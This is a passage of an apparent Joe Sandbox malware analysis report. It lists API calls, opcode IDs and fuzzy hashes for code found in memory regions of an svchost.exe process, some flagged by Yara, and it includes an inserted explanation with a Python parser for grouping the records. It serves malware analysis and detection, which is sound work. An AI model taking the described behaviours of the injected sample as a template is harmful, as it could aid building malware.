                                                                                                              • Instruction Fuzzy Hash: 7001FB7140110ABBEF126F52CC49EEA7FABFF08358F088011FD5855520DB32A9B1EBA4
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 02593B53
                                                                                                                • Part of subcall function 02593AAE: ___BuildCatchObjectHelper.LIBCMT ref: 02593AE4
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 02593B6A
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 02593B78
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction ID: c1dc63e69f4db2cfc44812a31ef357b7e3bb16fbe67e41826799ccd66b20bf3b
                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction Fuzzy Hash: 8A01EF7240110AFBDF22AF51DC48EAA7F6BFF48354F0040A0BD5965120E732D9A1DBA9
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2102557794-0
                                                                                                              • Opcode ID: d70878f2851c3567c271e931555f1996d9542e4474f1755c76b641d8c5b06530
                                                                                                              • Instruction ID: a9bdacd272b3bca2d8cf648793d02214ed3a9a307c772e69720945efbe3da3e1
                                                                                                              • Opcode Fuzzy Hash: d70878f2851c3567c271e931555f1996d9542e4474f1755c76b641d8c5b06530
                                                                                                              • Instruction Fuzzy Hash: 8631A0F26003056BF7109F6AD8C1B56B7E9BF48314F00863ADA09C7641EBB1F554C795
                                                                                                              APIs
                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 02583C9F
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583CDA
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 02583D25
                                                                                                              • WSAGetLastError.WS2_32(?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583D5B
                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,0258397F,?,?,00000000,000000FF,00000000), ref: 02583D82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 316788870-0
                                                                                                              • Opcode ID: dc8182892369a6443067befa9cbbb9e9f163f19b2cc9ae412bd06d6db00bcce2
                                                                                                              • Instruction ID: 76826897c436e88229414aba869b12870db330bbfb6ecb15569c7f635949f91e
                                                                                                              • Opcode Fuzzy Hash: dc8182892369a6443067befa9cbbb9e9f163f19b2cc9ae412bd06d6db00bcce2
                                                                                                              • Instruction Fuzzy Hash: AD314E72605200AFEB14BF68D4C87693BA9FF84714F5104A6FE05EB245F7B0D890CB58
                                                                                                              APIs
                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 04DF3CBF
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3CFA
                                                                                                              • GetLastError.KERNEL32(00000000), ref: 04DF3D45
                                                                                                              • WSAGetLastError.WS2_32(?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3D7B
                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,04DF399F,?,?,00000000,000000FF,00000000), ref: 04DF3DA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 316788870-0
                                                                                                              • Opcode ID: 60a5dc0ad81527486c57a21d27def84f7d17699d691450ff5cd81946b83af2d5
                                                                                                              • Instruction ID: 371f01bff7d2f3543ead44c6e70bc26df506457a48b2c6f0ea5c559bf110308d
                                                                                                              • Opcode Fuzzy Hash: 60a5dc0ad81527486c57a21d27def84f7d17699d691450ff5cd81946b83af2d5
                                                                                                              • Instruction Fuzzy Hash: 1E31A1726042009BFB749F68DCC876A7769FB84324F030166EE09DB299E675F8918A51
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0258E6D5
                                                                                                                • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
                                                                                                                • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
                                                                                                                • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
                                                                                                              • _free.LIBCMT ref: 0258E6E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1020059152-0
                                                                                                              • Opcode ID: 953af04c32644784617986493a5739cc4e6d7c90934d9ca954342bbd50c83fba
                                                                                                              • Instruction ID: e0caeb404406aad340493fef7ab2ebcfcafc8a2df9a40b14dd7904d0b77ec23d
                                                                                                              • Opcode Fuzzy Hash: 953af04c32644784617986493a5739cc4e6d7c90934d9ca954342bbd50c83fba
                                                                                                              • Instruction Fuzzy Hash: 2A11A7329446266BCB223F75E8057693BB6BB843E0B614925F585FA140EBF4C8508B9C
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 955811338-0
                                                                                                              • Opcode ID: e127df09e7e4ed3b17ef2ac8311b2479d6dd24b67fd4341831bcc196f5df1968
                                                                                                              • Instruction ID: 62a89b658acced8e71aa125926099fbc768f891f0d2e23914c1aa526b2ffd9ca
                                                                                                              • Opcode Fuzzy Hash: e127df09e7e4ed3b17ef2ac8311b2479d6dd24b67fd4341831bcc196f5df1968
                                                                                                              • Instruction Fuzzy Hash: 8C110C321447066FEB21AFA5FDC0D9B77DDEF44B78B004029FA148A1D0DF71D8218A60
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 955811338-0
                                                                                                              • Opcode ID: 3c638c45730fe09817bc96cf6e3138b2a69ebc17fb14daba0e7deb7c5ce5773d
                                                                                                              • Instruction ID: 84650a82d277844c7523695956ca283f77b596c8e9de6e0fccb2d323649bd53c
                                                                                                              • Opcode Fuzzy Hash: 3c638c45730fe09817bc96cf6e3138b2a69ebc17fb14daba0e7deb7c5ce5773d
                                                                                                              • Instruction Fuzzy Hash: 2B1125322407466FFB10FFA4DC8099B37EAEF00738B10402DFA1486150DB71E401A6B0
                                                                                                              APIs
                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02582BFF
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02582C15
                                                                                                              • TranslateMessage.USER32(?), ref: 02582C24
                                                                                                              • DispatchMessageW.USER32(?), ref: 02582C2A
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02582C38
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2015114452-0
                                                                                                              • Opcode ID: 832bb620a72bff0239dea6347796be8a854e3c0ccd1bb0e8d86deffc148a3f2d
                                                                                                              • Instruction ID: 77cca40c27e3d6ecf516be03ccd40b8bc5ea6a7490174f2e5bf0910fe2e4a670
                                                                                                              • Opcode Fuzzy Hash: 832bb620a72bff0239dea6347796be8a854e3c0ccd1bb0e8d86deffc148a3f2d
                                                                                                              • Instruction Fuzzy Hash: 0E01A972A8430976E610AAA49C51FBA7BACFB04B10F504911FF04FB0C4DBE0E4159BBC
                                                                                                              APIs
                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04DF2C3F
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04DF2C55
                                                                                                              • TranslateMessage.USER32(?), ref: 04DF2C64
                                                                                                              • DispatchMessageW.USER32(?), ref: 04DF2C6A
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04DF2C78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 2015114452-0
                                                                                                              • Opcode ID: e68fbeba720b217d5c0de176bcd2516d170b0fad8beddecb57ed7ac8e9a0cf72
                                                                                                              • Instruction ID: 1535474fc9d451a86299a88c094aea24de69f057ac677185df3a1c7ecfb3806d
                                                                                                              • Opcode Fuzzy Hash: e68fbeba720b217d5c0de176bcd2516d170b0fad8beddecb57ed7ac8e9a0cf72
                                                                                                              • Instruction Fuzzy Hash: 41018B7679031976E620AA959C82FFA776CEB04B10F514551FB04EA0C4E6A6FC4187A4
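The two message-pump records above (MsgWaitForMultipleObjects / PeekMessageW / TranslateMessage / DispatchMessageW) carry the same API String ID, 2015114452-0, but different Opcode IDs and different dump offsets (02580000 and 04DF0000, the second flagged with Yara matches): the same function sits in two memory regions of the svchost.exe process. The same pairing recurs for the CRT records tagged 955811338-0 (02A00000 and 04C70000). The parser below is an added example, not Joe Sandbox's own code and not code from the analysed sample; it reads records in the layout seen on this page and groups them by API String ID so duplicate copies line up. The sample input is copied from this report's own records with some bullets omitted, and the record layout it assumes (an "APIs" header, a "Memory Dump Source" header whose "Source File" bullet ends in "Offset: <hex>, based on PE: <true|false>", an optional "Yara matches" line, then "Similarity" key: value bullets) is inferred from this page, not from a published format specification.

```python
"""Group Joe Sandbox function records by API String ID across memory dumps.

Added example; not Joe Sandbox code and not from the analysed sample. The
sample text is copied from this report's function records (some bullets
omitted). The record layout assumed here is inferred from the report page.
"""
import re
from collections import defaultdict

SAMPLE_RECORDS = """\
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02582BFF
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02582C15
• TranslateMessage.USER32(?), ref: 02582C24
• DispatchMessageW.USER32(?), ref: 02582C2A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02582C38
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
• API String ID: 2015114452-0
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04DF2C3F
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04DF2C55
• TranslateMessage.USER32(?), ref: 04DF2C64
• DispatchMessageW.USER32(?), ref: 04DF2C6A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04DF2C78
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
Yara matches
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
• API String ID: 2015114452-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
Similarity
• API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• API String ID: 955811338-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Yara matches
Similarity
• API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• API String ID: 955811338-0
"""

# "Name.Module(" or "Name.Module " -> the called name (imports and CRT internals alike)
API_RE = re.compile(r"^([A-Za-z_][\w@]*)\.[A-Za-z0-9_]+[\s(]")
DUMP_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_records(text):
    """One dict per function record; bullet glyphs and indentation are stripped."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":  # every record on the page opens with this header
            cur = {"apis": [], "subcalls": [], "offset": None,
                   "based_on_pe": None, "yara": False, "sim": {}}
            records.append(cur)
            section = "apis"
        elif cur is None:
            continue
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif line == "Yara matches":
            cur["yara"] = True
        elif section == "apis":  # "Part of subcall function ..." lines are kept apart
            target = cur["subcalls"] if line.startswith("Part of subcall") else cur["apis"]
            target.append(line)
        elif section == "Memory Dump Source":
            m = DUMP_RE.search(line)  # "Associated:" bullets carry no offset and are skipped
            if m:
                cur["offset"], cur["based_on_pe"] = m.group(1).upper(), m.group(2) == "true"
        elif section == "Similarity":
            key, _, val = line.partition(":")
            cur["sim"][key.strip()] = val.strip()
    return records


def api_names(record):
    """Names listed under APIs for the function itself, first-seen order, no repeats."""
    names = []
    for call in record["apis"]:
        m = API_RE.match(call)
        if m and m.group(1) not in names:
            names.append(m.group(1))
    return names


def group_by_api_string_id(records):
    """API String ID -> [(dump offset, Yara hit)], so one function body present in
    two regions of the same process shows up under a single key."""
    groups = defaultdict(list)
    for r in records:
        groups[r["sim"].get("API String ID", "")].append((r["offset"], r["yara"]))
    return dict(groups)


def duplicated_functions(records):
    """API String IDs seen in more than one memory dump region."""
    groups = group_by_api_string_id(records)
    return sorted(k for k, v in groups.items() if len({off for off, _ in v}) > 1)
```

Run over the whole function list of a report, `duplicated_functions` gives the set of API String IDs that recur across dump regions, and `group_by_api_string_id` shows which of those regions also carry Yara matches; that is a quick way to confirm that two dumps are copies of one injected image rather than two different payloads. The API String ID is a coarse key (it hashes the set of API names, not the code), so treat a match as a hint to compare the Opcode Fuzzy Hash fields, not as proof of identical code.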
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 02A13188
                                                                                                                • Part of subcall function 02A12D18: __getptd.LIBCMT ref: 02A12D26
                                                                                                                • Part of subcall function 02A12D18: __getptd.LIBCMT ref: 02A12D34
                                                                                                              • __getptd.LIBCMT ref: 02A13192
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __getptd.LIBCMT ref: 02A131A0
                                                                                                              • __getptd.LIBCMT ref: 02A131AE
                                                                                                              • __getptd.LIBCMT ref: 02A131B9
                                                                                                                • Part of subcall function 02A12DBD: __CallSettingFrame@12.LIBCMT ref: 02A12E09
                                                                                                                • Part of subcall function 02A13286: __getptd.LIBCMT ref: 02A13295
                                                                                                                • Part of subcall function 02A13286: __getptd.LIBCMT ref: 02A132A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282538202-0
                                                                                                              • Opcode ID: cd5fa55f7bbf90f2a481e1fc654e7c437620c89a58453831d0692201638dd461
                                                                                                              • Instruction ID: 209885e70381a1da724a2434c2ee7c6b07ffcf576f97e342415ea7455f7f14f7
                                                                                                              • Opcode Fuzzy Hash: cd5fa55f7bbf90f2a481e1fc654e7c437620c89a58453831d0692201638dd461
                                                                                                              • Instruction Fuzzy Hash: D811D771C4030ADFDF01EFA4D684AEEBBB1FF08310F5184AAE814A7291DB389A159F51
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 04C90FF5
                                                                                                                • Part of subcall function 04C90AD4: __getptd.LIBCMT ref: 04C90AE2
                                                                                                                • Part of subcall function 04C90AD4: __getptd.LIBCMT ref: 04C90AF0
                                                                                                              • __getptd.LIBCMT ref: 04C90FFF
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __getptd.LIBCMT ref: 04C9100D
                                                                                                              • __getptd.LIBCMT ref: 04C9101B
                                                                                                              • __getptd.LIBCMT ref: 04C91026
                                                                                                                • Part of subcall function 04C90B79: __CallSettingFrame@12.LIBCMT ref: 04C90BC5
                                                                                                                • Part of subcall function 04C910F3: __getptd.LIBCMT ref: 04C91102
                                                                                                                • Part of subcall function 04C910F3: __getptd.LIBCMT ref: 04C91110
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282538202-0
                                                                                                              • Opcode ID: c4ab0ca85f11a50824452c04bd077c01b724c7d79dcaa01a3b92a2a9b6c3820e
                                                                                                              • Instruction ID: 1e60b0f34d4f7dda4ecfd3fe4c721f0b9be73135e378cbe8e573041fea4d8dd3
                                                                                                              • Opcode Fuzzy Hash: c4ab0ca85f11a50824452c04bd077c01b724c7d79dcaa01a3b92a2a9b6c3820e
                                                                                                              • Instruction Fuzzy Hash: C011ECB1D00249EFEF00EFA5D549ADE7BF1FF04718F14906AE814A7260DB39A915AF50
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02584B63
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02584B6D
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02584B80
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02584B83
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3168844106-0
                                                                                                              • Opcode ID: 11196bebbdaee543a7776a99a6f036a3c035ee080f5bbf451dd2ffe0cf8597e2
                                                                                                              • Instruction ID: f9eab04b39693fe3443519ad0f155c78550ad132bdc78804a2eb2886fb67c8b5
                                                                                                              • Opcode Fuzzy Hash: 11196bebbdaee543a7776a99a6f036a3c035ee080f5bbf451dd2ffe0cf8597e2
                                                                                                              • Instruction Fuzzy Hash: A101A776A006149FD720EF35FCC4B6BB7E8FB88325F414819E50693100D774F8599BA4
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02A0DC08
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __getptd.LIBCMT ref: 02A0DC1F
                                                                                                              • __amsg_exit.LIBCMT ref: 02A0DC2D
                                                                                                              • __lock.LIBCMT ref: 02A0DC3D
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 02A0DC51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              • Opcode ID: d5dfd9dae79135417da2e060ef49d66a69c3cad8e15227165571327f1c3874f3
                                                                                                              • Instruction ID: 8d405e8082b630085ed73c20d0d7be3861db9b6dad9adb9a98042624bc2bca8c
                                                                                                              • Opcode Fuzzy Hash: d5dfd9dae79135417da2e060ef49d66a69c3cad8e15227165571327f1c3874f3
                                                                                                              • Instruction Fuzzy Hash: 51F0B433980B159BE731BBB8BAC179E33E2EF05B24F114149D4446B1C1CF74A940CE96
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04C84A21
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __getptd.LIBCMT ref: 04C84A38
                                                                                                              • __amsg_exit.LIBCMT ref: 04C84A46
                                                                                                              • __lock.LIBCMT ref: 04C84A56
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 04C84A6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 0258E23B
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __getptd.LIBCMT ref: 0258E252
                                                                                                              • __amsg_exit.LIBCMT ref: 0258E260
                                                                                                              • __lock.LIBCMT ref: 0258E270
                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0258E284
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 938513278-0
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 04DF7622
                                                                                                              • GetCommandLineW.KERNEL32 ref: 04DF7628
                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 04DF7637
                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 04DF765F
                                                                                                              • ExitProcess.KERNEL32 ref: 04DF7667
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                              • String ID:
                                                                                                              • API String ID: 3421218197-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 025883D0: _doexit.LIBCMT ref: 025883DC
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0258729C
                                                                                                                • Part of subcall function 025897C0: TlsGetValue.KERNEL32(00000000,02589919,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000), ref: 025897C9
                                                                                                                • Part of subcall function 025897C0: DecodePointer.KERNEL32(?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26,0000000D), ref: 025897DB
                                                                                                                • Part of subcall function 025897C0: TlsSetValue.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 025897EA
                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 025872A7
                                                                                                                • Part of subcall function 025897A0: TlsGetValue.KERNEL32(?,?,025872AC,00000000), ref: 025897AE
                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 025872BA
                                                                                                                • Part of subcall function 025897F4: DecodePointer.KERNEL32(?,?,?,025872BF,00000000,?,00000000), ref: 02589805
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 025872C3
                                                                                                              • ExitThread.KERNEL32 ref: 025872CA
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 025872D0
                                                                                                              • __freefls@4.LIBCMT ref: 025872F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 781180411-0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
